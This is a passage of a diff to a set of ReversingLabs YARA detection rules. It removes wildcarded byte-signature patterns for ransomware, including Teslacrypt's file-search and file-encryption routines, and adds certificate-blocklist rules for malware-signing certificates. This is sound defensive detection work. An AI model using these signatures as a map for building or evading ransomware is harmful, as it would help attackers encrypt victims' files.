?? 80 7D ?? ?? 75 ?? - 8B 03 E8 ?? ?? ?? ?? 33 C0 89 03 33 C0 89 07 8B 45 ?? 50 E8 ?? ?? ?? ?? 8A 45 ?? 5F - 5E 5B 8B E5 5D C2 - } - $remote_connection_p1 = { - BB ?? ?? ?? ?? 83 FB ?? 75 ?? 33 C0 89 45 ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 8B - C6 E8 ?? ?? ?? ?? 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 33 C0 89 45 ?? 8D 45 ?? - 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 83 C0 - ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? 8B 45 ?? 59 E8 ?? ?? ?? - ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? - ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D 85 ?? ?? ?? ?? 8B 55 ?? - E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B D0 42 8B 45 ?? 59 E8 - ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 FF 0F - 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 - ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A - ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 - 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D - ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A - } - $remote_connection_p2 = { - 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 - ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A - 58 76 ?? EB ?? 5A 58 7E ?? 8B 06 E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? - ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D - ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? - 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A - ?? 8B 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? - ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B - 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 - 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 76 ?? EB ?? 5A 58 7E ?? 8B 06 - E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 - C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D - ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 - } - $encrypt_files = { - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? - E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 - ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 - ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? - ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? - 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF - 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 - ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? - ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D - ?? ?? 74 - } - condition: - uint16(0)==0x5A4D and ($enum_resources) and ( all of ($find_files_p*)) and ($encrypt_files) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RAFO TECHNOLOGY INC" and pe.signatures[i].serial=="21:1b:5d:fe:65:bc:6f:34:bc:9d:3a:54" and 1526717931<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Teslacrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE { meta: - description = "Yara rule that detects Teslacrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "842dae76-573c-564d-b658-ccdda451df21" - date = "2020-07-15" - modified = "2020-07-15" + id = "2b35f2db-ebf1-5533-858c-644dbd6dfb2b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Teslacrypt.yara#L1-L665" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cc054be68d833d9f29a4ebd1c202922881b0d22a2605edc7def1048dc08f6325" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15004-L15020" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fbdd37e050d68c4287e897f050a673aea071df105a35b07475d3233da3f03feb" score = 75 - quality = 65 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + quality = 90 + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Teslacrypt" + category = "INFO" importance = 25 - strings: - $file_search_0_3_1_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? - 51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B5 01 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? - 83 3D ?? ?? ?? ?? ?? 0F 85 89 01 00 00 F6 44 24 ?? ?? 0F 84 D2 00 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 - 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 - 29 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 - C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 EA 00 00 00 56 8D 94 24 ?? ?? ?? ?? 68 - } - $file_search_0_3_1_2 = { - 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 7E FE FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? - 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? - 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB - 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? - 0F 84 6A FE FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $file_search_0_3_3_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? - 51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 57 02 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? - 83 3D ?? ?? ?? ?? ?? 0F 85 2B 02 00 00 F6 44 24 ?? ?? 0F 84 74 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 - 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 - CB 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 - C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 8C 01 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 52 E8 ?? ?? ?? ?? 8B C6 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? - ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 - } - $file_search_0_3_3_2 = { - E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 - ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E8 00 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? - ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB - 05 1B C0 83 D8 ?? 85 C0 0F 84 A9 00 00 00 8D 84 24 ?? ?? ?? ?? 57 50 E8 DC FD FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 - 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? - ?? EB 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? - ?? ?? 0F 84 C8 FD FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $file_search_0_3_4a_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? - ?? 8D 84 24 ?? ?? ?? ?? 57 50 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 57 51 66 89 BC - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F - 84 99 02 00 00 8B BC 24 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 76 02 00 00 F6 44 24 ?? ?? 0F 84 6B - 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 02 00 00 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 1E 02 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? - 83 C4 ?? 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D - 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 - 0F 84 AF 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 92 01 00 00 8D 94 24 ?? ?? - ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 75 01 00 00 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 - } - $file_search_0_3_4a_2 = { - 83 C4 ?? 85 C0 0F 84 58 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3B 01 - 00 00 8D 94 24 ?? ?? ?? ?? 57 52 E8 10 FE FF FF 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? E9 E7 00 00 00 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 79 8D 54 - 24 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 7F 00 00 00 8D 44 24 ?? 50 E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 63 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 75 47 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 35 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB 23 8D - 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 10 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 - ?? 50 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? 0F 84 7D FD FF FF 55 FF 15 ?? ?? ?? ?? 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D - 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $file_search_0_3_5a_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D - 84 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A - ?? 51 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? - 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 0F 84 91 03 00 00 8B 9C 24 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 84 73 02 00 00 8D 4C - 24 ?? B8 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 - 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 23 03 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 1E - 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E3 - 02 00 00 55 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C5 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 - C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 - 24 ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 - 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 - C0 0F 84 3F 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? - 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 00 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 - } - $file_search_0_3_5a_2 = { - 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 - 1B C0 83 D8 ?? 85 C0 0F 84 C1 01 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B - 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 82 01 00 00 8D 8C 24 ?? - ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 - 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 43 01 00 00 8D 8C 24 ?? ?? ?? ?? 53 51 E8 0F FD FF FF 8D 94 24 ?? ?? ?? ?? - 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ED 00 00 00 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 - 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 8D 44 24 ?? 0F 84 79 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 ?? - 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 78 00 00 00 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 59 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 3A 8D 7C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 2C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 1E 68 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 0C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 8D 4C 24 ?? 51 57 FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 7D FC FF FF 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_file_0_2_6a_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? - ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 - 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? - ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A - ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 1A 57 56 - FF 15 ?? ?? ?? ?? 8B F8 